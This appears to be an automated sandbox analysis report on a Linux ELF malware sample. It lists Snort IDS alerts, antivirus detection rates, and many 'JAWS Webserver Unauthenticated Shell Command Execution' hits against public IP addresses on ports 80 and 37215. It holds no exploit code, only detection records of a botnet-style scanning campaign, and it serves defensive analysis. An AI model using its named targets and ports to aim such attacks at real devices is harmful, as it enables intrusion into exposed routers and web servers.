              Timestamp:06/01/24-18:15:55.259969
              SID:2829579
              Source Port:33794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.308506
              SID:2829579
              Source Port:52032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.238700
              SID:2030092
              Source Port:47264
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.287004
              SID:2030092
              Source Port:39420
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.254489
              SID:2829579
              Source Port:60378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.255235
              SID:2835222
              Source Port:40978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256393
              SID:2829579
              Source Port:36614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.267489
              SID:2030092
              Source Port:42554
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.275795
              SID:2835222
              Source Port:47684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.262801
              SID:2835222
              Source Port:43862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252202
              SID:2829579
              Source Port:41014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.238961
              SID:2030092
              Source Port:37350
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.272559
              SID:2025883
              Source Port:55190
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.267046
              SID:2030092
              Source Port:55082
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.256722
              SID:2835222
              Source Port:52616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.239285
              SID:2030092
              Source Port:46058
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.254976
              SID:2829579
              Source Port:56050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.244879
              SID:2030092
              Source Port:44768
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.305877
              SID:2835222
              Source Port:34924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261159
              SID:2829579
              Source Port:57668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.240296
              SID:2030092
              Source Port:44588
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.306811
              SID:2835222
              Source Port:46756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.263479
              SID:2829579
              Source Port:55144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252592
              SID:2835222
              Source Port:41724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.255840
              SID:2829579
              Source Port:44038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256242
              SID:2835222
              Source Port:45778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274865
              SID:2835222
              Source Port:43694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252084
              SID:2829579
              Source Port:54532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.272743
              SID:2025883
              Source Port:38762
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.247051
              SID:2030092
              Source Port:53500
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.240510
              SID:2030092
              Source Port:41746
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.254853
              SID:2835222
              Source Port:47606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.241698
              SID:2030092
              Source Port:40300
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.306008
              SID:2835222
              Source Port:47108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.241218
              SID:2030092
              Source Port:32800
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.240024
              SID:2030092
              Source Port:55394
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.240427
              SID:2030092
              Source Port:34260
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.307042
              SID:2835222
              Source Port:47800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.308237
              SID:2835222
              Source Port:45302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256596
              SID:2829579
              Source Port:41396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275397
              SID:2829579
              Source Port:58696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.262262
              SID:2835222
              Source Port:39182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.245630
              SID:2030092
              Source Port:49634
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.237533
              SID:2030092
              Source Port:40304
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.262753
              SID:2835222
              Source Port:43784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.273912
              SID:2835222
              Source Port:35310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.305968
              SID:2829579
              Source Port:59194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.273749
              SID:2835222
              Source Port:47490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.238712
              SID:2025883
              Source Port:39940
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.259198
              SID:2835222
              Source Port:57288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.238118
              SID:2025883
              Source Port:60810
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.268136
              SID:2030092
              Source Port:46120
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.246505
              SID:2030092
              Source Port:52478
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.241108
              SID:2025883
              Source Port:52008
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.275705
              SID:2835222
              Source Port:51478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274503
              SID:2829579
              Source Port:56590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.265079
              SID:2030092
              Source Port:49604
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.273833
              SID:2829579
              Source Port:40358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.263359
              SID:2835222
              Source Port:45096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.254703
              SID:2025883
              Source Port:42576
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.256096
              SID:2829579
              Source Port:35190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.240357
              SID:2030092
              Source Port:59202
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.244800
              SID:2025883
              Source Port:47080
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.306118
              SID:2829579
              Source Port:36192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.246905
              SID:2025883
              Source Port:35964
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.255482
              SID:2835222
              Source Port:57988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261518
              SID:2835222
              Source Port:37822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.247268
              SID:2030092
              Source Port:47738
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.247394
              SID:2030092
              Source Port:44764
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.275135
              SID:2829579
              Source Port:39124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.253620
              SID:2835222
              Source Port:46024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240843
              SID:2030092
              Source Port:40970
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.252244
              SID:2835222
              Source Port:48832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.253278
              SID:2829579
              Source Port:58966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.262188
              SID:2835222
              Source Port:56490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.259625
              SID:2835222
              Source Port:34526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274950
              SID:2829579
              Source Port:50200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.263799
              SID:2835222
              Source Port:47668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307625
              SID:2829579
              Source Port:38878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252728
              SID:2835222
              Source Port:57592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.306738
              SID:2835222
              Source Port:44436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275251
              SID:2835222
              Source Port:54080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.287888
              SID:2835222
              Source Port:37586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.255551
              SID:2835222
              Source Port:39538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240582
              SID:2025883
              Source Port:40758
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.260976
              SID:2835222
              Source Port:55978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.246425
              SID:2030092
              Source Port:54018
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.254818
              SID:2829579
              Source Port:38566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275663
              SID:2829579
              Source Port:54092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307801
              SID:2829579
              Source Port:52408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261655
              SID:2829579
              Source Port:57692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: t9lNEiD3ui.elfAvira: detected
              Source: t9lNEiD3ui.elfReversingLabs: Detection: 65%
              Source: t9lNEiD3ui.elfVirustotal: Detection: 61%Perma Link

              Networking

              barindex
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35232 -> 146.154.17.102:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40304 -> 176.184.31.108:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42174 -> 118.56.224.81:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57450 -> 138.193.26.70:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45786 -> 134.10.23.167:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48530 -> 91.176.40.173:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53384 -> 115.206.192.214:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37624 -> 42.244.32.219:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50616 -> 198.208.129.228:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51866 -> 98.108.66.200:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53862 -> 149.115.99.191:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37480 -> 92.126.90.34:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44742 -> 81.132.76.122:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60788 -> 193.77.243.238:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60742 -> 35.40.58.241:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49670 -> 115.246.114.148:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43832 -> 34.240.253.41:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58212 -> 78.247.12.109:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56838 -> 117.200.77.204:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39456 -> 107.165.24.228:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44946 -> 81.37.220.40:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55598 -> 43.221.116.139:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59816 -> 37.168.229.134:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51142 -> 149.127.43.235:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42178 -> 41.79.241.72:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39486 -> 202.24.92.234:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44104 -> 145.100.188.83:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34700 -> 202.238.8.254:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56756 -> 174.194.105.235:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55292 -> 140.5.76.153:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35842 -> 83.231.82.8:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47264 -> 57.222.230.206:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52794 -> 128.101.239.153:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58574 -> 45.5.242.217:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34108 -> 204.167.44.181:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34456 -> 194.252.4.200:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42554 -> 68.39.123.219:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49564 -> 95.237.237.156:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58070 -> 186.28.217.117:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58076 -> 142.5.237.169:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51510 -> 205.249.54.111:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44372 -> 117.241.145.89:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36520 -> 72.194.176.69:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46058 -> 51.243.182.171:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52812 -> 41.59.82.228:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50980 -> 212.199.183.185:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37288 -> 41.62.241.247:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54284 -> 110.176.150.43:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34360 -> 92.228.245.159:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56234 -> 95.239.226.123:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51050 -> 108.85.135.218:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40992 -> 52.206.114.48:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60104 -> 58.199.54.70:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50078 -> 129.193.114.98:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44778 -> 25.87.20.30:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54416 -> 146.97.242.87:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54180 -> 222.84.171.34:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36546 -> 196.44.130.154:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38194 -> 48.234.108.156:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32914 -> 45.238.94.61:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55394 -> 12.95.201.102:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51500 -> 187.75.110.93:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33834 -> 106.16.15.220:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47714 -> 204.135.242.117:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39420 -> 31.70.83.31:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37886 -> 154.1.74.103:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34922 -> 158.4.130.100:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33706 -> 187.205.139.84:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49442 -> 124.60.75.137:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34260 -> 105.120.208.242:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37714 -> 206.121.1.240:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50218 -> 159.209.163.86:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54536 -> 197.114.181.205:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40758 -> 136.107.130.201:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50846 -> 50.8.69.255:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56784 -> 162.133.179.162:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33210 -> 155.78.6.227:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40970 -> 113.32.208.233:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39732 -> 128.151.195.102:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33878 -> 112.152.48.8:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53558 -> 81.48.62.152:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46490 -> 93.152.148.219:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45540 -> 144.192.66.230:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55216 -> 51.180.72.227:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52008 -> 198.24.255.213:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42950 -> 160.171.210.51:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42926 -> 173.201.55.115:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32800 -> 118.131.29.171:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38354 -> 8.194.32.207:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42066 -> 198.139.79.120:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48762 -> 191.185.132.251:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58476 -> 223.81.79.132:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54708 -> 173.142.129.181:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58654 -> 89.243.242.221:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45266 -> 50.235.115.106:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52886 -> 80.252.121.45:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40554 -> 60.55.180.73:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40300 -> 81.78.87.67:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34492 -> 123.28.179.254:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50824 -> 87.130.72.182:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57298 -> 24.4.140.180:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57174 -> 37.47.52.166:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43646 -> 121.59.20.215:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47804 -> 161.166.48.249:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60716 -> 18.69.98.66:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40782 -> 170.90.134.85:80
